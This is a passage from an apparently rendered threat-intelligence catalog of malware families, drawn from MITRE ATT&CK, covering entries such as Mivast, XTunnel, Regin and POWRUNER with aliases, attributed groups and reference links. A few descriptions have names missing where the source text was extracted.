</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mivast_s0080"><a class="anchor" href="#_mivast_s0080"></a><a class="link" href="#_mivast_s0080">Mivast - S0080</a></h3>
<div class="paragraph">
<p>Mivast is a backdoor that has been used by Deep Panda. It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine)</p>
</div>
<div class="paragraph">
<p>Aliases: Mivast</p>
</div>
<div class="paragraph">
<p>Mivast - S0080 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Mivast</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1028. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0080">https://attack.mitre.org/wiki/Software/S0080</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/the-black-vine-cyberespionage-group.pdf">http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/the-black-vine-cyberespionage-group.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_isminjector_s0189"><a class="anchor" href="#_isminjector_s0189"></a><a class="link" href="#_isminjector_s0189">ISMInjector - S0189</a></h3>
<div class="paragraph">
<p>ISMInjector is a Trojan used to install another OilRig backdoor, ISMAgent. (Citation: OilRig New Delivery Oct 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: ISMInjector</p>
</div>
<div class="paragraph">
<p>Contributors: Robert Falcone</p>
</div>
<div class="paragraph">
<p>ISMInjector - S0189 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ISMInjector</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1029. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0189">https://attack.mitre.org/wiki/Software/S0189</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/">https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cherry_picker_s0107"><a class="anchor" href="#_cherry_picker_s0107"></a><a class="link" href="#_cherry_picker_s0107">Cherry Picker - S0107</a></h3>
<div class="paragraph">
<p>Cherry Picker is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)</p>
</div>
<div class="paragraph">
<p>Aliases: Cherry Picker</p>
</div>
<div class="paragraph">
<p>Cherry Picker - S0107 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Cherry Picker</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1030. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0107">https://attack.mitre.org/wiki/Software/S0107</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/">https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xtunnel_s0117"><a class="anchor" href="#_xtunnel_s0117"></a><a class="link" href="#_xtunnel_s0117">XTunnel - S0117</a></h3>
<div class="paragraph">
<p>XTunnel a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by APT28 during the compromise of the Democratic National Committee. (Citation: Crowdstrike DNC June 2016) (Citation: Invincea XTunnel) (Citation: ESET Sednit Part 2)</p>
</div>
<div class="paragraph">
<p>Aliases: XTunnel, X-Tunnel, XAPS</p>
</div>
<div class="paragraph">
<p>XTunnel - S0117 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>XTunnel</p>
</li>
<li>
<p>X-Tunnel</p>
</li>
<li>
<p>XAPS</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1031. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0117">https://attack.mitre.org/wiki/Software/S0117</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/">https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_geminiduke_s0049"><a class="anchor" href="#_geminiduke_s0049"></a><a class="link" href="#_geminiduke_s0049">GeminiDuke - S0049</a></h3>
<div class="paragraph">
<p>GeminiDuke is malware that was used by APT29 from 2009 to 2012. (Citation: F-Secure The Dukes)</p>
</div>
<div class="paragraph">
<p>Aliases: GeminiDuke</p>
</div>
<div class="paragraph">
<p>GeminiDuke - S0049 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>GeminiDuke</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1032. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0049">https://attack.mitre.org/wiki/Software/S0049</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sakula_s0074"><a class="anchor" href="#_sakula_s0074"></a><a class="link" href="#_sakula_s0074">Sakula - S0074</a></h3>
<div class="paragraph">
<p>Sakula is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. (Citation: Dell Sakula)</p>
</div>
<div class="paragraph">
<p>Aliases: Sakula, Sakurel, VIPER</p>
</div>
<div class="paragraph">
<p>Sakula - S0074 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sakula</p>
</li>
<li>
<p>Sakurel</p>
</li>
<li>
<p>VIPER</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1033. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0074">https://attack.mitre.org/wiki/Software/S0074</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/">http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_agent_btz_s0092"><a class="anchor" href="#_agent_btz_s0092"></a><a class="link" href="#_agent_btz_s0092">Agent.btz - S0092</a></h3>
<div class="paragraph">
<p>Agent.btz is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. (Citation: Securelist Agent.btz)</p>
</div>
<div class="paragraph">
<p>Aliases: Agent.btz</p>
</div>
<div class="paragraph">
<p>Agent.btz - S0092 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Agent.btz</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1034. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0092">https://attack.mitre.org/wiki/Software/S0092</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/agent-btz-a-source-of-inspiration/58551/">https://securelist.com/agent-btz-a-source-of-inspiration/58551/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113"><a class="anchor" href="#_prikormka_s0113"></a><a class="link" href="#_prikormka_s0113">Prikormka - S0113</a></h3>
<div class="paragraph">
<p>Prikormka is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. (Citation: ESET Operation Groundbait)</p>
</div>
<div class="paragraph">
<p>Aliases: Prikormka</p>
</div>
<div class="paragraph">
<p>Prikormka - S0113 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Prikormka</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1035. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0113">https://attack.mitre.org/wiki/Software/S0113</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_neteagle_s0034"><a class="anchor" href="#_neteagle_s0034"></a><a class="link" href="#_neteagle_s0034">NETEAGLE - S0034</a></h3>
<div class="paragraph">
<p>NETEAGLE is a backdoor developed by APT30 with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” (Citation: FireEye APT30)</p>
</div>
<div class="paragraph">
<p>Aliases: NETEAGLE</p>
</div>
<div class="paragraph">
<p>NETEAGLE - S0034 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>NETEAGLE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1036. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0034">https://attack.mitre.org/wiki/Software/S0034</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136"><a class="anchor" href="#_usbstealer_s0136"></a><a class="link" href="#_usbstealer_s0136">USBStealer - S0136</a></h3>
<div class="paragraph">
<p>USBStealer is malware that has used by APT28 since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with ADVSTORESHELL. (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy)</p>
</div>
<div class="paragraph">
<p>Aliases: USBStealer, USB Stealer, Win32/USBStealer</p>
</div>
<div class="paragraph">
<p>USBStealer - S0136 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>USBStealer</p>
</li>
<li>
<p>USB Stealer</p>
</li>
<li>
<p>Win32/USBStealer</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1037. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0136">https://attack.mitre.org/wiki/Software/S0136</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/">http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/">https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_calendar_s0025"><a class="anchor" href="#_calendar_s0025"></a><a class="link" href="#_calendar_s0025">CALENDAR - S0025</a></h3>
<div class="paragraph">
<p>CALENDAR is malware used by APT1 that mimics legitimate Gmail Calendar traffic. (Citation: Mandiant APT1)</p>
</div>
<div class="paragraph">
<p>Aliases: CALENDAR</p>
</div>
<div class="paragraph">
<p>CALENDAR - S0025 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CALENDAR</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1038. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0025">https://attack.mitre.org/wiki/Software/S0025</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wingbird_s0176"><a class="anchor" href="#_wingbird_s0176"></a><a class="link" href="#_wingbird_s0176">Wingbird - S0176</a></h3>
<div class="paragraph">
<p>is a backdoor appears to be a new version of commercial software , which is marketed to government agencies. It is reportedly used to attack individual computers instead of networks. It was used by in a May 2016 campaign. (Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: Wingbird</p>
</div>
<div class="paragraph">
<p>Wingbird - S0176 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Wingbird</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1039. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0176">https://attack.mitre.org/wiki/Software/S0176</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft%20Security%20Intelligence%20Report%20Volume%2021%20English.pdf">http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft%20Security%20Intelligence%20Report%20Volume%2021%20English.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/">https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_regin_s0019"><a class="anchor" href="#_regin_s0019"></a><a class="link" href="#_regin_s0019">Regin - S0019</a></h3>
<div class="paragraph">
<p>Regin is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some Regin timestamps date back to 2003. (Citation: Kaspersky Regin)</p>
</div>
<div class="paragraph">
<p>Aliases: Regin</p>
</div>
<div class="paragraph">
<p>Regin - S0019 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Regin</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1040. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0019">https://attack.mitre.org/wiki/Software/S0019</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2014/11/Kaspersky%20Lab%20whitepaper%20Regin%20platform%20eng.pdf">https://securelist.com/files/2014/11/Kaspersky%20Lab%20whitepaper%20Regin%20platform%20eng.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_autoit_backdoor_s0129"><a class="anchor" href="#_autoit_backdoor_s0129"></a><a class="link" href="#_autoit_backdoor_s0129">AutoIt backdoor - S0129</a></h3>
<div class="paragraph">
<p>AutoIt backdoor is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. (Citation: Forcepoint Monsoon) This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.</p>
</div>
<div class="paragraph">
<p>Aliases: AutoIt backdoor</p>
</div>
<div class="paragraph">
<p>AutoIt backdoor - S0129 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>AutoIt backdoor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1041. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0129">https://attack.mitre.org/wiki/Software/S0129</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf">https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_powruner_s0184"><a class="anchor" href="#_powruner_s0184"></a><a class="link" href="#_powruner_s0184">POWRUNER - S0184</a></h3>
<div class="paragraph">
<p>POWRUNER is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: POWRUNER</p>
</div>
<div class="paragraph">
<p>POWRUNER - S0184 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>POWRUNER</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1042. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0184">https://attack.mitre.org/wiki/Software/S0184</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html">https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_power_loader_s0177"><a class="anchor" href="#_power_loader_s0177"></a><a class="link" href="#_power_loader_s0177">Power Loader - S0177</a></h3>
<div class="paragraph">
<p>is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)</p>
</div>
<div class="paragraph">
<p>Aliases: Power Loader, Win32/Agent.UAW</p>
</div>
<div class="paragraph">
<p>Power Loader - S0177 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Power Loader</p>
</li>
<li>
<p>Win32/Agent.UAW</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1043. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0177">https://attack.mitre.org/wiki/Software/S0177</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html">https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/">https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pteranodon_s0147"><a class="anchor" href="#_pteranodon_s0147"></a><a class="link" href="#_pteranodon_s0147">Pteranodon - S0147</a></h3>
<div class="paragraph">
<p>Pteranodon is a custom backdoor used by Gamaredon Group. (Citation: Palo Alto Gamaredon Feb 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: Pteranodon</p>
</div>
<div class="paragraph">
<p>Pteranodon - S0147 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Pteranodon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1044. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0147">https://attack.mitre.org/wiki/Software/S0147</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/">https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rarstone_s0055"><a class="anchor" href="#_rarstone_s0055"></a><a class="link" href="#_rarstone_s0055">RARSTONE - S0055</a></h3>
<div class="paragraph">
<p>RARSTONE is malware used by the Naikon group that has some characteristics similar to PlugX. (Citation: Aquino RARSTONE)</p>
</div>
<div class="paragraph">
<p>Aliases: RARSTONE</p>
</div>
<div class="paragraph">
<p>RARSTONE - S0055 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RARSTONE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1045. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0055">https://attack.mitre.org/wiki/Software/S0055</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/">http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_matroyshka_s0167"><a class="anchor" href="#_matroyshka_s0167"></a><a class="link" href="#_matroyshka_s0167">Matroyshka - S0167</a></h3>
<div class="paragraph">
<p>Matroyshka is a malware framework used by CopyKittens that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)</p>
</div>
<div class="paragraph">
<p>Aliases: Matroyshka</p>
</div>
<div class="paragraph">
<p>Matroyshka - S0167 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Matroyshka</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1046. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0167">https://attack.mitre.org/wiki/Software/S0167</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/wp-content/uploads/2017/07/Operation%20Wilted%20Tulip.pdf">http://www.clearskysec.com/wp-content/uploads/2017/07/Operation%20Wilted%20Tulip.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf">https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shotput_s0063"><a class="anchor" href="#_shotput_s0063"></a><a class="link" href="#_shotput_s0063">SHOTPUT - S0063</a></h3>
<div class="paragraph">
<p>SHOTPUT is a custom backdoor used by APT3. (Citation: FireEye Clandestine Wolf)</p>
</div>
<div class="paragraph">
<p>Aliases: SHOTPUT, Backdoor.APT.CookieCutter, Pirpi</p>
</div>
<div class="paragraph">
<p>SHOTPUT - S0063 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SHOTPUT</p>
</li>
<li>
<p>Backdoor.APT.CookieCutter</p>
</li>
<li>
<p>Pirpi</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1047. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0063">https://attack.mitre.org/wiki/Software/S0063</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html">https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trojan_karagany_s0094"><a class="anchor" href="#_trojan_karagany_s0094"></a><a class="link" href="#_trojan_karagany_s0094">Trojan.Karagany - S0094</a></h3>
<div class="paragraph">
<p>Trojan.Karagany is a backdoor primarily used for recon. The source code for it was leaked in 2010 and it is sold on underground forums. (Citation: Symantec Dragonfly)</p>
</div>
<div class="paragraph">
<p>Aliases: Trojan.Karagany</p>
</div>
<div class="paragraph">
<p>Trojan.Karagany - S0094 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Trojan.Karagany</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1048. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0094">https://attack.mitre.org/wiki/Software/S0094</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/Dragonfly%20Threat%20Against%20Western%20Energy%20Suppliers.pdf">http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/Dragonfly%20Threat%20Against%20Western%20Energy%20Suppliers.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kasidet_s0088"><a class="anchor" href="#_kasidet_s0088"></a><a class="link" href="#_kasidet_s0088">Kasidet - S0088</a></h3>
<div class="paragraph">
